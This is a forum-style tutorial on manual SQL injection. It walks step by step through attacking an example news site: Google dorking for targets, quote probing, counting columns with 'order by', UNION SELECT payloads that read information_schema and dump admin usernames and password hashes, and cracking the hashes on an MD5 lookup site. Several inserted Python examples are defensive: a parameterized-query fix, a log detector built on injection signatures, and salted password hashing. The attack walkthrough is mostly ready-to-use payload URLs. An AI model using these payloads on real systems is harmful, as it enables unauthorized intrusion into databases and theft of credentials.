SQL Injection Manual (Basic Tutorial)


Today, I will show you how SQLi can be easy!
This is only a basic tutorial.

Introduction:

This is very simple: use these dorks with a SQLi scanner, or Google them and check every site yourself:
http://pastebin.com/vAZqkzMx

Now check each site manually to see if it is vulnerable: just add ' at the end of the URL.

For example, we have our target,
Code:
http://www.example.net/news_details.php?id=30

Now we want to check whether this is vulnerable to SQLi, so we add ' at the end:
Code:
http://www.example.net/news_details.php?id=30'

If we get an error, that means the site is vulnerable!


So, now we move on to the next step.

How To Find Columns Count:

After you have your vulnerable site, you need to know its column count. To do this, just add "order by X--" at the end of the URL,
where X is a number starting from 1.

For example, we have our target server and we try to count columns:
we add order by 1-- at the end, then order by 2--, etc. Keep increasing the number until you get an error on the website like this one:


So, in our target server, we have tried this:
Code:
http://www.example.net/news_details.php?id=30 order by 1-- >> no error
http://www.example.net/news_details.php?id=30 order by 2-- >> no error
http://www.example.net/news_details.php?id=30 order by 3-- >> no error
http://www.example.net/news_details.php?id=30 order by 4-- >> no error
http://www.example.net/news_details.php?id=30 order by 5-- >> no error
http://www.example.net/news_details.php?id=30 order by 6-- >> no error
http://www.example.net/news_details.php?id=30 order by 7-- >> no error
http://www.example.net/news_details.php?id=30 order by 8-- >> Unknown column

That means that the 8th column does not exist, so the column count is 7!

How to Find The Accessible Columns:

Now we know that the column count is 7. The next step is to check for accessible columns; to do that, we use the query "UNION SELECT number,of,columns--" like this:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,6,7--

You will get something like this:


That means that we can get information from the site from the 6th, the 2nd and the 3rd column!
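To see why the ' test, the order by probe and the union select probe behave the way the tutorial describes, and why a parameterised query stops all three, here is an added example that is not part of the original post. It uses an in-memory SQLite database as a stand-in for the MySQL site (an assumption made so it runs offline) with a constructed 7-column "news" table; the probes produce the same "error / no error" signal that the tutorial reads off the page:

```python
import sqlite3

# Constructed stand-in for the tutorial's news site: an in-memory SQLite database
# with a 7-column "news" table. SQLite replaces MySQL here so the block runs offline;
# the sample row is invented.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT,
                           posted TEXT, views INTEGER, category TEXT);
        INSERT INTO news VALUES (30, 'Welcome', 'First post', 'editor',
                                 '2024-01-01', 12, 'general');
    """)
    return conn

def vulnerable_lookup(conn, id_param):
    """The pattern the tutorial exploits: the raw query-string value is pasted into SQL."""
    sql = "SELECT * FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def safe_lookup(conn, id_param):
    """Hardened form: the value is bound as a parameter, so it is data, never SQL."""
    return conn.execute("SELECT * FROM news WHERE id=?", (id_param,)).fetchall()

def probe(lookup, id_param):
    """Run one lookup against a fresh database and summarise what the client would see."""
    conn = make_db()
    try:
        rows = lookup(conn, id_param)
    except sqlite3.Error as exc:
        return "error: %s" % exc   # the "error page" the tutorial looks for
    finally:
        conn.close()
    return "rows: %d" % len(rows)

if __name__ == "__main__":
    for payload in ("30", "30'", "30 order by 7--", "30 order by 8--",
                    "30 union select 1,2,3,4,5,6,7--"):
        print("%-36r vulnerable -> %-55s safe -> %s"
              % (payload, probe(vulnerable_lookup, payload), probe(safe_lookup, payload)))
```

With the concatenated query, the stray quote is a syntax error, "order by 8" fails because the statement only has 7 columns (SQLite reports the term as out of range where MySQL reports an unknown column), and the union returns a second, attacker-chosen row. With the bound parameter every one of those strings is compared to the id column as a plain value and simply matches nothing; validating that the parameter is an integer before the query is a cheap extra layer on top of that.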

How To Get MySQL DB Version:

We need to know the MySQL DB version to know whether we can exploit this site or not, because every site using MySQL 4.x.x is impossible to work with, but every 5.x.x or above is exploitable.
So to get the MySQL DB version, just replace the number of the used column with "@@version".

For example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--



That means that we can continue working on this site.

How To Find Database Name:

Now we are going to inject the site to find the DB name.
To do this, replace the used column number with "group_concat(schema_name)", and add "from information_schema.schemata--" after the last column number, for example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--


Now, to get the one the website uses, replace "group_concat(schema_name)" with "concat(database())", for example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--


Congrats, you got the used DB!

How to Get The Table Names:

Now we need to get the table names. To do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" after the last column number.

Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--


How To Get Column Names:

To get column names, we will use this query:
group_concat(column_name)
from information_schema.columns where table_schema=database()--

Example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
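Every step so far leaves a distinctive trail in the web server's access log: a quoted id, a run of "order by N--" requests, then "union select" with @@version and information_schema. The following added example (not part of the original post) parses a few constructed Apache-style log lines, URL-decodes the request, matches those stages, and raises an alert for a client that shows more than one stage or whose probing coincides with server errors. The log format, the IP addresses and the thresholds are assumptions for the demonstration:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined style, shortened). Not real traffic;
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news_details.php?id=30 HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] "GET /news_details.php?id=30%27 HTTP/1.1" 500 311
203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /news_details.php?id=30%20order%20by%208-- HTTP/1.1" 500 311
203.0.113.5 - - [01/Jan/2024:10:00:20 +0000] "GET /news_details.php?id=30%20union%20select%201,2,3,4,5,@@version,7-- HTTP/1.1" 200 5200
203.0.113.5 - - [01/Jan/2024:10:00:31 +0000] "GET /news_details.php?id=30+union+select+1,2,3,4,5,group_concat(table_name),7+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 6100
198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /news_details.php?id=31 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# One signature per stage of the injection chain described in the tutorial.
SIGNATURES = {
    "quote_probe": re.compile(r"[?&]id=\d+'(?:$|&)", re.I),          # id=30'
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),   # order by 8--
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "version_fingerprint": re.compile(r"@@version\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
}

def parse_line(line):
    """Split one log line into fields; the URL is decoded so %20 and + cannot hide keywords."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_url"] = unquote_plus(rec["url"])
    rec["status"] = int(rec["status"])
    return rec

def matched_signatures(decoded_url):
    """Names of all signatures that fire on a decoded request URL, sorted for stable output."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded_url))

def analyse(log_text):
    """Aggregate signature hits per client IP and return the clients worth alerting on."""
    per_client = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        sigs = matched_signatures(rec["decoded_url"])
        if not sigs:
            continue
        entry = per_client.setdefault(rec["ip"], {"signatures": set(), "hits": 0, "errors": 0})
        entry["signatures"].update(sigs)
        entry["hits"] += 1
        if rec["status"] >= 500:
            entry["errors"] += 1   # the error pages the tutorial is hunting for
    alerts = {}
    for ip, e in per_client.items():
        # Escalate when a client shows more than one stage of the chain, or when
        # repeated probing coincides with server errors (assumed thresholds).
        if len(e["signatures"]) >= 2 or (e["errors"] > 0 and e["hits"] >= 2):
            alerts[ip] = {"signatures": sorted(e["signatures"]),
                          "hits": e["hits"], "errors": e["errors"]}
    return alerts

if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG).items():
        print(ip, info)
```

Decoding before matching matters: the same payload arrives as %20, + or mixed-case keywords, and a rule that only looks at the raw URL misses it. The per-client aggregation is what turns individual noisy matches into a useful alert, because one "order by" in isolation is common in legitimate traffic while the full sequence from a single source is not.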


How To Get Information From Columns:

Now we are in our final step: getting the admin info from the columns. How do we do it?
Simple, follow this example:

Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columnusername,0x3a,columnpassword),7 from currentdb.tableused--

So our exploit will be like this:

Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from example_gh.coc_admin--



Now we need to crack the password, which is stored as an MD5 hash:
go to http://www.md5decrypter.co.uk/, paste your hash, fill in the captcha and click on decrypt. With a little luck, you will get the password, like here:
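The reason a lookup site can "decrypt" the hash is that an unsalted MD5 of a common password is the same on every site and for every user, so it only has to be computed once and stored. The added example below (not part of the original post) contrasts that with a per-user salt and a slow key-derivation function, which is what an application should store instead; the user names and passwords are constructed, and PBKDF2-HMAC-SHA256 with 600,000 iterations is used as the replacement (the iteration count follows current OWASP guidance and is an assumption here):

```python
import hashlib
import hmac
import os

def md5_hex(password):
    """What the tutorial's target stores: one unsalted, fast hash per password."""
    return hashlib.md5(password.encode()).hexdigest()

def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Salted, slow hash in a self-describing format: algo$iterations$salt_hex$digest_hex."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())

def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate.hex(), digest_hex)

def lookup_table_hits(stored_hashes, precomputed):
    """Count stored hashes that a precomputed (password -> md5) table resolves directly."""
    reverse = {h: pw for pw, h in precomputed.items()}
    return sum(1 for h in stored_hashes if h in reverse)

# Constructed accounts: two users happen to share the same weak password.
USERS = {"alice": "summer2024", "bob": "summer2024", "carol": "correct horse battery"}

def demo():
    # A table of common passwords, computed once, breaks every unsalted MD5 that matches it.
    precomputed = {pw: md5_hex(pw) for pw in ("123456", "summer2024", "password")}
    md5_store = [md5_hex(pw) for pw in USERS.values()]
    pbkdf2_store = {u: pbkdf2_hash(pw) for u, pw in USERS.items()}
    return {
        "md5_identical_for_shared_password": md5_hex(USERS["alice"]) == md5_hex(USERS["bob"]),
        "pbkdf2_differs_for_shared_password": pbkdf2_store["alice"] != pbkdf2_store["bob"],
        "md5_accounts_resolved_by_table": lookup_table_hits(md5_store, precomputed),
        "pbkdf2_verify_ok": pbkdf2_verify("summer2024", pbkdf2_store["alice"]),
        "pbkdf2_verify_wrong": pbkdf2_verify("summer2025", pbkdf2_store["alice"]),
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print("%-36s %s" % (k, v))
```

The salt makes every stored value unique even when two users pick the same password, so no table can be built in advance, and the iteration count makes each guess cost real CPU time instead of a nanosecond. Dumped hashes of this form are still a serious incident, but they no longer hand over the password for the price of a captcha.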


We have successfully injected a website and got the admin info! Thank you for reading my tutorial!

I am not responsible for your actions.


Leave a comment if you like the post!